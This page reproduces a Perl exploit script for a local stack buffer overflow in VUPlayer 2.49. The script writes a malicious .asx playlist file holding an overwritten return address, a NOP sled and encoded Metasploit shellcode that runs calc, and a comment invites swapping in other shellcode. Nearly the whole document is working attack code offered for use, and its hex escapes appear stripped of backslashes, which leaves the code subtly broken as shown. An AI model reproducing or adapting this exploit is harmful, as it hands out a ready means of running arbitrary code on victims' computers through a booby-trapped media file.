Home / os / win10

vuplayerasx-overflow.txt

Posted on 09 January 2009

#!/usr/bin/perl -w


# author : Houssamix

# VUPlayer 2.49 (.asx File) local Stack Overflow Exploit

print "
########################################################################
#~ Author   : HouSSamix                                                #
#~ Program  : VUPlayer                                                 #
#~ Version  : 2.49                                                     #
#~ website  : http://www.vuplayer.com/                                 #
#~ Download : http://vuplayer.com/files/vuplayersetup.exe              #
#~ Type     : (.asx File) local Stack Overflow Exploit                 #
########################################################################
";
###################################################################
$BOF =
"x3Cx41x53x58x20x56x45x52x53x49x4Fx4Ex3Dx22x33x2E".
"x30x22x3Ex0Ax0Dx0Ax3Cx45x4Ex54x52x59x3Ex0Ax3Cx54".
"x49x54x4Cx45x3Ex50x72x4Fx20x53x70x59x3Cx2Fx54x49".
"x54x4Cx45x3Ex0Ax0Dx0Ax3Cx52x45x46x20x48x52x45x46".
"x3Dx22x6Dx51x47x69x42x45x67x30x33x70x55x52x42x41".
"x44x55x56x77x4Ax75x4Bx53x51x2Bx73x4Dx45x6Cx34x78".
"x43x5Ax75x77x42x75x6Ax53x53x58x4Ax69x30x62x46x6B".
"x32x31x49x34x66x75x30x69x70x64x56x34x68x41x31x32".
"x45x49x4Fx6Dx34x69x41x34x30x70x48x39x72x50x69x43".
"x48x6Bx65x41x52x71x50x75x6Ax4Fx71x6Cx78x63x4Dx6E".
"x52x51x68x39x62x43x32x2Bx75x53x34x4Dx54x67x63x2B".
"x46x38x52x33x62x62x51x56x65x61x57x36x6Ex38x6Cx5A".
"x2Bx48x51x59x57x5Ax4Dx77x57x41x72x30x31x4Cx61x5A".
"x38x64x64x57x37x38x59x69x58x45x49x75x5Ax47x71x72".
"x62x37x69x6Dx62x57x79x6Bx4Bx70x45x68x52x34x41x71".
"x73x78x6Cx6Fx6Dx73x5Ax74x37x73x33x77x43x67x6Ax72".
"x69x47x75x62x48x78x5Ax79x37x70x75x63x6Ax63x36x37".
"x77x52x43x79x5Ax31x4Ax66x6Bx44x2Fx33x55x4Dx53x48".
"x2Fx53x32x4Bx35x68x79x62x34x33x38x4Ex32x4Ex43x4B".
"x7Ax79x74x61x79x4Ex69x52x50x63x65x57x4Bx50x6Dx4F".
"x73x2Fx4Dx51x6Fx38x75x55x5Ax35x43x52x2Bx35x54x34".
"x55x51x59x75x2Bx53x4Dx62x75x69x75x6Dx31x78x78x48".
"x64x47x62x54x33x5Ax6Fx63x63x6Ex61x4Cx65x72x77x41".
"x36x38x56x52x30x55x50x4Ex76x62x66x64x45x64x74x44".
"x43x4Fx4Ax49x51x44x4Ax66x72x34x45x6Fx56x77x6Ex6F".
"x49x45x43x57x73x57x38x37x6Fx59x41x61x36x72x4Dx38".
"x65x46x53x70x6Cx42x63x6Fx4Ex68x74x34x6Dx4Ex74x54".
"x35x74x6Bx66x41x64x47x6Dx66x66x54x4Fx52x73x4Bx54".
"x65x54x71x68x79x71x41x2Fx30x57x39x49x79x41x70x4A".
"x34x6Bx6Ax4Cx53x4Cx32x7Ax31x4Bx4Bx67x33x67x31x6C".
"x65x63x58x66x7Ax6Fx55x32x43x68x34x66x76x68x31x54".
"x44x6Dx68x34x57x39x69x37x42x72x6Bx38x70x61x2Bx38".
"x32x79x49x57x38x79x44x34x56x78x30x37x4Cx57x49x39".
"x4Dx32x5Ax59x56x2Fx63x68x72x48x35x4Dx66x56x4Dx47".
"x62x6Cx56x4Dx73x32x53x61x51x63x47x41x6Ex67x51x72".
"x71x35x43x38x5Ax6Bx31x68x79x65x44x70x36x54x75x46".
"x56x39x55x47x4Bx59x73x6Fx65x4Cx6Bx38x53x71x39x6F".
"x58x63x5Ax4Fx4Cx42x50x70x67x4Bx31x6Fx4Ex35x63x65".
"x47x77x38x30x70x31x4Bx4Cx4Cx4Dx33x57x47x73x55x6E".
"x36x64x6Ex62x51x63x62x57x6Cx73x64x7Ax42x79x62x53".
"x41x38x63x33x56x69x62x57x6Cx30x51x47x31x70x62x48".
"x63x77x63x6Dx30x75x59x32x39x74x50x6Fx68x67x42x42".
"x4Dx52x41x67x41x67x42x51x4Ax49x4Ex4Ex36x56x41x68".
"x73x44x42x67x73x4Ax43x41x63x44x41x67x51x56x41x67".
"x67x44x42x42x59x43x41x77x45x43x48x67x45x43x46x34".
"x41x41x43x67x6Bx51x6Ex55x35x2Bx76x33x57x47x38x6F".
"x59x79x7Ax67x43x5Ax41x57x74x55x68x4Dx6Cx76x7Ax78".
"x35x43x6Ax74x55x79x41x42x2Fx72x6Dx69x4Bx63x6Fx2F".
"x41x41x6Ex41x39x48x63x46x6Dx6Cx39x37x36x65x5Ax64".
"x56x64x62x5Ax6Fx75x35x44x6Ex58x6Dx79x2Fx47x75x51".
"x51x4Ex42x45x67x30x33x77x38x51x45x41x43x43x35x47".
"x54x34x30x73x76x7Ax5Ax59x4Ax4Bx59x6Dx39x64x51x46".
"x6Ex76x75x54x6Bx56x68x52x72x79x50x73x65x4Ax76x33".
"x58x6Dx44x67x52x42x42x70x64x45x74x63x74x33x79x50".
"x35x63x4Fx61x47x31x41x6Ex62x56x32x6Dx32x79x50x79".
"x6Cx6Cx6Ex78x4Ax41x61x74x7Ax52x6Cx70x58x59x73x32".
"x61x2Bx6Cx32x37x41x64x32x65x46x6Fx4Cx6Cx45x68x31".
"x39x38x6Dx6Ax56x50x75x66x59x4Cx62x6Bx71x35x42x74".
"x33x53x39x41x2Bx46x36x69x58x68x51x72x2Bx4Ax54x58".
"x4Dx41x54x50x44x48x67x34x43x2Fx39x71x66x79x52x62".
"x63x55x68x70x35x57x61x61x4Ex5Ax42x6Dx51x49x31x32".
"x34x6Fx6Dx4Ex5Ax5Ax54x4Cx56x4Cx34x72x49x62x4Cx73".
"x56x49x77x33x77x79x4Cx31x5Ax44x71x4Dx38x72x72x73".
"x54x51x41x57x72x61x47x35x6Ax79x73x37x5Ax37x65x69".
"x78x49x6Bx64x64x58x37x36x73x6Dx6Ex4Dx78x53x56x67".
"x50x6Ax63x77x5Ax6Bx49x43x37x49x2Fx2Bx2Fx41x4Cx61".
"x4Cx69x4Fx41x74x31";
$ECX = "x43x43x43x43";
$nops = "x33x33x33x37x34x6Dx49x4Dx4Fx70x4Ex42";
$EIP = "x5Dx38x82x7C" ; # EIP

$c =	"x90" x 36 ;



# u can change this shellcode but dont forget to use Encoder=PexAlphaNum

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x30x42x50x42x30x4bx58x45x34x4ex43x4bx48x4ex37".
"x45x30x4ax57x41x30x4fx4ex4bx38x4fx44x4ax41x4bx58".
"x4fx55x42x42x41x50x4bx4ex49x34x4bx58x46x53x4bx38".
"x41x30x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx33x46x35x46x52x46x30x45x37x45x4ex4bx58".
"x4fx35x46x32x41x50x4bx4ex48x36x4bx48x4ex50x4bx54".
"x4bx38x4fx45x4ex31x41x50x4bx4ex4bx48x4ex51x4bx38".
"x41x50x4bx4ex49x48x4ex55x46x32x46x50x43x4cx41x43".
"x42x4cx46x56x4bx48x42x34x42x53x45x58x42x4cx4ax57".
"x4ex30x4bx48x42x44x4ex30x4bx58x42x57x4ex51x4dx4a".
"x4bx38x4ax46x4ax50x4bx4ex49x50x4bx58x42x58x42x4b".
"x42x30x42x30x42x30x4bx58x4ax46x4ex43x4fx45x41x43".
"x48x4fx42x46x48x35x49x58x4ax4fx43x38x42x4cx4bx47".
"x42x35x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax39".
"x50x4fx4cx38x50x50x47x35x4fx4fx47x4ex43x36x41x36".
"x4ex56x43x36x42x50x5a";

$cc =	"x90" x 7687 ;

$asx =  "x2Ex61x73x66x22x2Fx3Ex0Ax3Cx2Fx45x4Ex54x52x59x3E".
"x0Ax3Cx2Fx41x53x58x3Ex0A";

$file="houssamix.asx";
open($FILE, ">$file");
$exp = $BOF.$ECX.$nops.$EIP.$c.$shellcode.$cc.$asx;
print $FILE $exp;
close($FILE);

print "
################################
File exploit created open it with vuplayer
################################
Exploit by Houssamix


";

 

TOP

Malware :

Exploits :